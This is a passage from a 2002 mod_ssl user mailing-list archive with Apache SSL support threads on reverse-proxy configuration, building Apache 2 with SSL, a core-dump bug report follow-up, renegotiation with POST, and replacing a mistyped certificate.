    _default_:443>=20
    
SSLEngine on=20
    
ServerName www.mydomain.com=20
    
DocumentRoot /usr/local/apache/htdocs=20
    
ErrorLog logs/443-error_log=20
    
</VirtualHost>=20
    
Listen *:80=20
    
<VirtualHost =
*:80>=20
    
ServerAdmin hamid@mydomain.com=20
    
DocumentRoot /usr/local/apache/www=20
    
ServerName www1.mydomain.com=20
    
ErrorLog logs/80-error_log=20
    
</VirtualHost>=20
    

    
Can anyone see a conflict =
or omission=20
    in this configuration? Does anyone have these two modules working =
together=20
    in a reverse proxy scenario? Any help or suggestions would be=20
    appreciated.=20
    

    
Regards,=20
    
Hamid.=20
    

    
PS. Please reply to hmajidy@attbi.com as well as =
to this=20
    list.


------=_NextPart_000_0096_01C29C4A.A076AC00--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec  5 19:51:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA22430; Thu, 5 Dec 2002 19:50:40 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA22346; Thu, 5 Dec 2002 19:49:40 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 84E924CE783; Thu,  5 Dec 2002 19:49:40 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id CB5E6286B2; Thu,  5 Dec 2002 19:49:08 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailserver.kippdata.de id NAA24893; Thu, 5 Dec 2002 13:47:14 +0100 (MET)
Received: from aalto (aalto.kippdata.de [195.227.30.142])
	by mailserver.kippdata.de (8.8.6/8.8.6) with ESMTP id NAA02591;
	Thu, 5 Dec 2002 13:50:12 +0100 (MET)
Message-Id: <4.2.2.20021205135348.00c14e50@mailserver.kippdata.de>
X-Sender: steinert@mailserver.kippdata.de
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 
Date: Thu, 05 Dec 2002 13:55:03 +0100
To: modssl-users@modssl.org
From: Bernd Steinert 
Subject: A bug in table_adjust function that causes a core dump
Cc: Rainer.Jung@kippdata.de, Rainer.Jung@postbank.de
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bernd Steinert 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

on November 11 Kirill Shirkov reported a bug in the table_adjust function
that causes core dumps. He described how the core dumps can be reproduced.
Some colleague of mine confirmed this behaviour.

Shirkov also described a bug fix. Up to now (December 5) there are no changes
in the file ssl_util_table.c in the mod_ssl CVS repository. So, I would 
like to aks:
1. Is Shirkovs code change going to be integrated in the offical code? Or 
is there
     some other fix for this bug that will be integrarted?
2. When can some fix be expected in CVS?
3. When can it be expected to be seen in some offical release?

Thanks a lot for any answer!

    Bernd Steinert



---
Dr. Bernd Steinert
kippdata GmbH		Tel.: 0228 - 9 85 49 0
Bornheimer Str. 33a		Fax: 0228 - 9 85 49 50
D-53111 Bonn			eMail: bernd.steinert@kippdata.de
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec  5 19:51:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA22438; Thu, 5 Dec 2002 19:50:44 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA22350; Thu, 5 Dec 2002 19:49:41 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id A61BF4CE789; Thu,  5 Dec 2002 19:49:40 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id B2C8D286B2; Thu,  5 Dec 2002 19:49:35 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sfoexh01.yipes.com id QAA11741; Thu, 5 Dec 2002 16:14:56 +0100 (MET)
Received: by sfoexh01.yipes.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 5 Dec 2002 07:13:46 -0800
Message-ID: <9C67F3C3FD4F3A43BB64A7C60871DC3F31D24E@sfoexh01.yipes.com>
From: David Loesche 
To: "'modssl-users@modssl.org'" 
Subject: RE: Mod_ssl in apache 2.X
Date: Thu, 5 Dec 2002 07:13:45 -0800 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Loesche 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Here is a config for Solaris 8, gcc 3.1, Apache 2.x - multithreaded with SSL
- I had no issues with this and am not an expert on Linuz by any means.
Perhaps this might help.  If not delete it.

#!/bin/ksh
PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin
LD_LIBRARY_PATH=/usr/local/lib:/usr/local/ssl/lib:/usr/lib
export PATH LD_LIBRARY_PATH

SSL_BASE=/usr/local/ssl \
LIBS=/usr/lib/libC.so.5 \
CFLAGS=-fPIC \

./configure     --prefix=/opt/apache \
                --enable-ssl \
                --with-ssl=/usr/local/ssl/ \
                --enable-so \
                --with-mpm=worker \
                --enable-deflate

David S. Loesche
david.loesche@yipes.com			Yipes Enterprise Services, Inc.
Main: 	(415) 901-2000 			114 Sansome Street, Suite 1045
Direct: 	(415) 901-2210			San Francisco, CA 94104
Fax: 	(415) 901-2201			http://www.yipes.com

Yipes is the defining provider of fully scalable bandwidth for businesses.
We offer fully managed high-speed Internet and Nationwide LAN-to-LAN
services at speeds ranging from 1 Mbps to 1 Gbps, in 1 Mbps increments. 

Yipes delivers this uniquely flexible service over the first nationwide
system of optical IP networks.


-----Original Message-----
From: Johan Bryssling [mailto:johan.bryssling@assembla.se]
Sent: Thursday, December 05, 2002 2:39 AM
Cc: modssl-users@modssl.org
Subject: RE: Mod_ssl in apache 2.X

Hi!

Im not here to quarrel with you kid. Im here to get some help, and your
insults are not helping very much.

I thought this was the modssl-users list for people with
not-so-much-expert-knowledge and not the linux-experts-with-nolife
mailinglist.

Im working under time pressure and cannot afford reading old documentation
all day and then guess how the latter versions work (but of course I have
read most of the old documentation anyway...).

If I understand the example below I could rewrite it:

CC="pgcc" CFLAGS="-O2" \
     ./configure --prefix=/sw/pkg/apache \
     --enable-ssl=shared
?

... and load "mod_ssl.so" dynamically with "Loadmodule" latter on? Right?
(Of course its right.. ;) )

"Now you have to do some work on your own, you can't expect others to do it
all for you and remain lazy."

You call me lazy and think you know me after one email, that's cute. ;) I
was asking a question and not hiring you or anybody else for a job. You even
didnt have to answer. Im not demanding anything. (This is the first time I
ask a usergroup a question at all, silly.)

"The new apache is not the best as far as documentation concerns, certainly
not up to the documentation that the older apache with or without mod-ssl
integration, but, there is info to be gleened, if one looks"

Right, I and other developers still havnt all day, thats why it exists
user-groups to ask someone who already knows and perhaps have some time over
for an clear answer.

If I had some time over myself I would be happy to contribute with some
quick-start-(dummy)-tutorials, because it's needed. Setting up Apache2 with
SSL must be one of the most common configurations... Perhaps I will
contribute in not-so-distance-future. ;)

Regards

/Johan







-----Original Message-----
From: R. DuFresne [mailto:dufresne@sysinfo.com]
Sent: den 4 december 2002 16:53
To: Johan Bryssling
Cc: modssl-users@modssl.org
Subject: Re: Mod_ssl in apache 2.X



Didn't read any of the documentation in that tarball did ya?

   INSTALL

        [SNIP]

  For a short impression of what possibilities you have, here is a
  typical example which configures Apache for the installation tree
  /sw/pkg/apache with a particular compiler and flags plus the two
  additional modules mod_rewrite and mod_speling for later loading
  through the DSO mechanism:

     $ CC="pgcc" CFLAGS="-O2" \
     ./configure --prefix=/sw/pkg/apache \
     --enable-rewrite=shared \
     --enable-speling=shared

  The easiest way to find all of the configuration flags for Apache 2.0
  is to run ./configure --help.

        [SNIP]

The new apache is not the best as far as documentation concerns, certainly
not up to the documentation that the older apache with or without mod-ssl
integration, but, there is info to be gleened, if one looks.

How about the apache web pages, read that at all?

Now you have to do some work on your own, you can't expect others to do it
all for you and remain lazy.

Thanks,

Ron DuFresne

On Wed, 4 Dec 2002, Johan Bryssling wrote:

> Hi!
>
> I have a couple of questions:
>
> If mod_ssl is included in apache2.x why doesnt it show up in the
modulelist
> when I use:
>
> %> httpd -l
>
> ?
>
> If it's not "included" when I "default" compile (using the INSTALL-file
> instructions), how do I know how to compile in the mod_ssl into the apache
> (if this is my first time)?
>
> Where do I find information about these things, I certanly dont install
> apache at a regulary basis.. ;-)
>
> I noted a default config file for SSL (I also found an include into the
> httpd.config-file) and used the command:
>
> %>httpd -DSSL -k start
>
> .. but it(apache) couldnt find the mod_ssl.. Why? If it's included I
> shouldnt bother or?... Something I missed?
>
> All help will be appricated.
>
> Thanks...
>
> /Johan
>
> ps. Thinking of using Apache 1.3.7 instead due to the extended source of
> good documentation...
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec  5 21:51:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA27900; Thu, 5 Dec 2002 21:50:49 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id VAA27823; Thu, 5 Dec 2002 21:50:07 +0100 (MET)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id gB5KnaFJ000797;
	Thu, 5 Dec 2002 15:49:36 -0500
Date: Thu, 5 Dec 2002 15:49:35 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
cc: Rainer.Jung@kippdata.de, 
Subject: Re: A bug in table_adjust function that causes a core dump
In-Reply-To: <4.2.2.20021205135348.00c14e50@mailserver.kippdata.de>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 5 Dec 2002, Bernd Steinert wrote:

> on November 11 Kirill Shirkov reported a bug in the table_adjust function
> that causes core dumps. He described how the core dumps can be reproduced.
> Some colleague of mine confirmed this behaviour.

I must have missed the patch... can someone repost it for me (and CC: me
and Ralf on it), and put [PATCH] at the beginning of the subject line of
the message.

> 1. Is Shirkovs code change going to be integrated in the offical code?

Sure... I just need a copy of it.

> 2. When can some fix be expected in CVS?
> 3. When can it be expected to be seen in some offical release?

I can handle the commit to the 2.0.x series... but it's up to Ralf to have
it incorporated into the next release for 1.3.x.

Thanks,
Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec  5 22:35:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA00588; Thu, 5 Dec 2002 22:34:21 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from euler.mat.univ.szczecin.pl id WAA00570; Thu, 5 Dec 2002 22:34:04 +0100 (MET)
Received: from gepard (euler.mat.univ.szczecin.pl [212.14.9.15])
	by euler.mat.univ.szczecin.pl (8.11.6/8.11.6) with ESMTP id gB5LWGG11482
	for ; Thu, 5 Dec 2002 22:32:18 +0100
Content-Type: text/plain;
  charset="iso-8859-1"
From: Marcin 
To: modssl-users@modssl.org
Subject: Re: ssl renegotiation in post not allowed?
Date: Thu, 5 Dec 2002 22:33:53 +0100
User-Agent: KMail/1.4.3
References: <728DED14DCADD611A05800508BDE83552F1279@EXCHANGE-NT>
In-Reply-To: <728DED14DCADD611A05800508BDE83552F1279@EXCHANGE-NT>
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <200212052233.53801.migor@op.pl>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Marcin 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You wrote:

> 	I'm having a problem using client authentication with POST method. I
> have an Apache 2.0.43, server side SSL works fine. The browser is an

Hi Alejandro,
I came across the same problem. I had to upgrade Apache from 1.3.27 (this 
version just kills the MSIE on Windows XP) to 2.0.43. I tried the Debian 
package first, than I built Apache from scratch, and finally I built the 
latest sources from CVS with SSL EXPERIMENTAL flag -- but all without luck.
I found the following bug in Apache bugzilla:
http://nagoya.apache.org/bugzilla/show_bug.cgi?id=12355 (bug #12355)
which describes exactly the same behaviour we noticed,
and voted for it, but it still has a Status: NEW  and nobody seemed to take 
care of it.

> I need to get this working as soon as posible.
So do I.

Please, share your solution if you find some.

-- 
Marcin

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec  6 05:57:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA16208; Fri, 6 Dec 2002 05:56:19 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sccrmhc01.attbi.com id FAA16187; Fri, 6 Dec 2002 05:55:23 +0100 (MET)
Received: from hm2k (12-240-105-132.client.attbi.com[12.240.105.132])
          by sccrmhc01.attbi.com (sccrmhc01) with SMTP
          id <2002120604551600100qg4qpe>; Fri, 6 Dec 2002 04:55:16 +0000
From: "HMajidy" 
To: 
Subject: mod_ssl & mod_proxy
Date: Thu, 5 Dec 2002 20:49:53 -0800
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_009E_01C29C9F.DC98CDD0"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "HMajidy" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_009E_01C29C9F.DC98CDD0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

This is to report a problem with Apache with mod_ssl and mod_proxy, and to
request the community’s help in resolving it.



Objective: The objective is to set up Apache as a reverse proxy, to receive
encrypted HTTPS traffic over the Internet and to convert it to HTTP and
direct it to a web server through a firewall.



Problem: Apache seems to be redirecting traffic to the virtual hosts on the
local filesystem correctly, but mod_proxy does not seem to send requests to
remote URL (as specified by ProxyRemote directive below). SSL does display
correct certificate from requesting browser.



Troubleshooting Steps Taken: Experimenting with the target URL (IP and
hosname) and various proxy directives (ie ProxyPassReverse, ProxyPass) I
have not been able to establish that proxy is doing anything at all.

Apache has been recompiled with mod_ssl and mod_proxy as DSOs as well as
statically linked in modules.



Here’s the system configuration:

Linux version 2.2.16-22smp

gcc version egcs-2.91.66

Server version: Apache/1.3.27 (Unix)

Compiled-in modules:

  http_core.c

  mod_env.c

  mod_log_config.c

  mod_mime.c

  mod_negotiation.c

  mod_status.c

  mod_include.c

  mod_autoindex.c

  mod_dir.c

  mod_cgi.c

  mod_asis.c

  mod_imap.c

  mod_actions.c

  mod_userdir.c

  mod_alias.c

  mod_access.c

  mod_auth.c

  mod_proxy.c

  mod_setenvif.c

  mod_ssl.c

OpenSSL 0.9.6g 9 August 2002



httpd.conf

AddModule mod_proxy.c



    ProxyRequests off

    NoCache *

    AllowCONNECT 443,80

    

        Order Allow,Deny

        Allow from All

    

ProxyRemote * http://1.2.3.4:85



NameVirtualHost *

Listen *:443



        SSLEngine on

        ServerName www.mydomain.com

        DocumentRoot /usr/local/apache/htdocs

        ErrorLog logs/443-error_log



Listen *:80



    ServerAdmin hamid@mydomain.com

    DocumentRoot /usr/local/apache/www

    ServerName www1.mydomain.com

    ErrorLog logs/80-error_log





Can anyone see a conflict or omission in this configuration? Does anyone
have these two modules working together in a reverse proxy scenario? Any
help or suggestions would be appreciated.



Regards,

Hamid.


------=_NextPart_000_009E_01C29C9F.DC98CDD0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable











This is to report a problem with Apache with =
mod_ssl and=20
mod_proxy, and to request the community=92s help in resolving it.  


 


Objective: The objective is to set up Apache as a reverse =
proxy, to=20
receive encrypted HTTPS traffic over the Internet and to convert it to =
HTTP and=20
direct it to a web server through a firewall.


 


Problem: Apache seems to be redirecting traffic to the virtual =
hosts on=20
the local filesystem correctly, but mod_proxy does not seem to send =
requests to=20
remote URL (as specified by ProxyRemote directive below). SSL does =
display=20
correct certificate from requesting browser.


 


Troubleshooting Steps Taken: Experimenting with the target URL =
(IP and=20
hosname) and various proxy directives (ie ProxyPassReverse, ProxyPass) I =
have=20
not been able to establish that proxy is doing anything at =
all.


Apache has been recompiled with mod_ssl and mod_proxy as DSOs =
as well as=20
statically linked in modules.


 


Here=92s the system configuration:


Linux version 2.2.16-22smp


gcc version egcs-2.91.66


Server version: Apache/1.3.27 (Unix)


Compiled-in modules:


 =20
http_core.c


 =20
mod_env.c


 =20
mod_log_config.c


 =20
mod_mime.c


 =20
mod_negotiation.c


 =20
mod_status.c


 =20
mod_include.c


 =20
mod_autoindex.c


 =20
mod_dir.c


 =20
mod_cgi.c


 =20
mod_asis.c


 =20
mod_imap.c


 =20
mod_actions.c


 =20
mod_userdir.c


 =20
mod_alias.c


 =20
mod_access.c


 =20
mod_auth.c


 =20
mod_proxy.c


 =20
mod_setenvif.c


 =20
mod_ssl.c


OpenSSL 0.9.6g 9 August 2002


 


httpd.conf


AddModule mod_proxy.c


<IfModule mod_proxy.c>


   =20
ProxyRequests off


   =20
NoCache *


   =20
AllowCONNECT 443,80


   =20
<Directory />


       =20
Order Allow,Deny


        =
Allow from=20
All


   =20
</Directory>


ProxyRemote * http://1.2.3.4:85


</IfModule>


NameVirtualHost *


Listen *:443


<VirtualHost _default_:443>


       =20
SSLEngine on


       =20
ServerName www.mydomain.com


       =20
DocumentRoot /usr/local/apache/htdocs


       =20
ErrorLog logs/443-error_log


</VirtualHost>


Listen *:80


<VirtualHost *:80>


   =20
ServerAdmin hamid@mydomain.com


   =20
DocumentRoot /usr/local/apache/www


   =20
ServerName www1.mydomain.com


   =20
ErrorLog logs/80-error_log


</VirtualHost>


 


Can anyone see a conflict or omission in this configuration? =
Does anyone=20
have these two modules working together in a reverse proxy scenario? Any =
help or=20
suggestions would be appreciated.


 


Regards,


Hamid.


------=_NextPart_000_009E_01C29C9F.DC98CDD0--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec  6 13:08:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA24529; Fri, 6 Dec 2002 13:08:01 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from Proxy2.ensino.net id NAA24448; Fri, 6 Dec 2002 13:06:23 +0100 (MET)
Received: from giba ([10.11.2.7])
	by Proxy2.ensino.net (8.11.6/8.11.1) with SMTP id gB6BrHq05357
	for ; Fri, 6 Dec 2002 09:53:18 -0200 (BRST)
	(envelope-from garcia@ensino.net)
Message-ID: <003901c29d21$0d512ae0$07020b0a@DOMAIN>
From: "Gilberto Garcia Jr." 
To: "mod ssl" 
Subject: changing certificate
Date: Fri, 6 Dec 2002 10:14:36 -0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0036_01C29D10.47B866A0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilberto Garcia Jr." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0036_01C29D10.47B866A0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hey guys,

i have a debian woody 3.0 linux installed at home. When i was installing =
apache-ssl i made a type mistake, so my ssl domais was wrong. and i need =
to know how to reconfigure my certificate.

ps->the apache home, http://127.0.0.1 doesn=B4t wanna open, it=B4s =
relationed with the certificate error?

thx

------=_NextPart_000_0036_01C29D10.47B866A0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hey guys,


 


i have a debian woody 3.0 linux =
installed at home.=20
When i was installing apache-ssl i made a type mistake, so my ssl domais =
was=20
wrong. and i need to know how to reconfigure my =
certificate.


 


ps->the apache home, http://127.0.0.1 doesn=B4t wanna open, =
it=B4s relationed=20
with the certificate error?


 


thx


------=_NextPart_000_0036_01C29D10.47B866A0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec  6 13:39:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA02475; Fri, 6 Dec 2002 13:38:47 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id NAA02187; Fri, 6 Dec 2002 13:37:26 +0100 (MET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gB6CbP5V018770
	for ; Fri, 6 Dec 2002 13:37:25 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gB6CbODm019087
	for ; Fri, 6 Dec 2002 13:37:24 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C29D24.3A87806E"
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Content-Transfer-Encoding: 7bit
Subject: RE: changing certificate
Date: Fri, 6 Dec 2002 13:37:24 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A5C9@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: changing certificate
Thread-Index: AcKdIFQQ+eohaBJbSJKjOuCqz6hc8AAA9xVQ
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C29D24.3A87806E
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

You can't. Otherwise you could change it to www.amazon.com....
=20
You need a new cert - which might be a problem if it's not self-signed.

-----Original Message-----
From: Gilberto Garcia Jr. [mailto:garcia@ensino.net]
Sent: Freitag, 6. Dezember 2002 13:15
To: mod ssl
Subject: changing certificate


Hey guys,
=20
i have a debian woody 3.0 linux installed at home. When i was installing
apache-ssl i made a type mistake, so my ssl domais was wrong. and i need
to know how to reconfigure my certificate.
=20
ps->the apache home, http://127.0.0.1 doesn=B4t wanna open, it=B4s
relationed with the certificate error?
=20
thx

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.=20

------_=_NextPart_001_01C29D24.3A87806E
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable













You=20
can't. Otherwise you could change it to www.amazon.com....
=


 


You=20
need a new cert - which might be a problem if it's not=20
self-signed.



  
-----Original Message-----
From: Gilberto Garcia =
Jr.=20
  [mailto:garcia@ensino.net]
Sent: Freitag, 6. Dezember 2002=20
  13:15
To: mod ssl
Subject: changing=20
  certificate


  
Hey guys,

  
 

  
i have a debian woody 3.0 linux =
installed at=20
  home. When i was installing apache-ssl i made a type mistake, so my =
ssl domais=20
  was wrong. and i need to know how to reconfigure my =
certificate.

  
 

  
ps->the apache home, http://127.0.0.1 doesn=B4t wanna open, =
it=B4s=20
  relationed with the certificate error?

  
 

  
thx




This message is for the named person's use only. It may contain =
confidential, proprietary or legally privileged information. No =
confidentiality or privilege is waived or lost by any mistransmission. =
If you receive this message in error, please notify the sender urgently =
and then immediately delete the message and any copies of it from your =
system. Please also immediately destroy any hardcopies of the message. =
You must not, directly or indirectly, use, disclose, distribute, print, =
or copy any part of this message if you are not the intended recipient. =
The sender's company reserves the right to monitor all e-mail =
communications through their networks. Any views expressed in this =
message are those of the individual sender, except where the message =
states otherwise and the sender is authorised to state them to be the =
views of the sender's company.=20




------_=_NextPart_001_01C29D24.3A87806E--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec  6 13:45:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA04031; Fri, 6 Dec 2002 13:44:35 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from Proxy2.ensino.net id NAA03805; Fri, 6 Dec 2002 13:43:30 +0100 (MET)
Received: from giba ([10.11.2.7])
	by Proxy2.ensino.net (8.11.6/8.11.1) with SMTP id gB6CUaq05857
	for ; Fri, 6 Dec 2002 10:30:36 -0200 (BRST)
	(envelope-from garcia@ensino.net)
Message-ID: <009c01c29d26$43867ac0$07020b0a@DOMAIN>
From: "Gilberto Garcia Jr." 
To: "mod ssl" 
Subject: changing certificate
Date: Fri, 6 Dec 2002 10:51:56 -0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0099_01C29D15.7EE053E0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilberto Garcia Jr." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0099_01C29D15.7EE053E0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Is there any way to erase the certificate and create a new one?

thks

------=_NextPart_000_0099_01C29D15.7EE053E0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Is there any way to erase the =
certificate and=20
create a new one?


 


thks


------=_NextPart_000_0099_01C29D15.7EE053E0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec  6 14:24:53 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA12277; Fri, 6 Dec 2002 14:23:28 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from me.homelinux.net id OAA12258; Fri, 6 Dec 2002 14:22:33 +0100 (MET)
Received: from Spooler by me.homelinux.net (Mercury/32 v3.32) ID MO000014;
    6 Dec 02 14:22:29 +0100
Received: from spooler by me.homelinux.net (Mercury/32 v3.32); 6 Dec 02 14:22:21 +0100
Received: from stupar.homelinux.net (192.168.10.1) by 194.249.40.218 (Mercury/32 v3.32) with ESMTP ID MG000013;
   6 Dec 02 14:22:07 +0100
Message-ID: <3DF0A494.3000301@stupar.homelinux.net>
Date: Fri, 06 Dec 2002 14:22:28 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1
X-Accept-Language: en, sl, fr
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: changing certificate
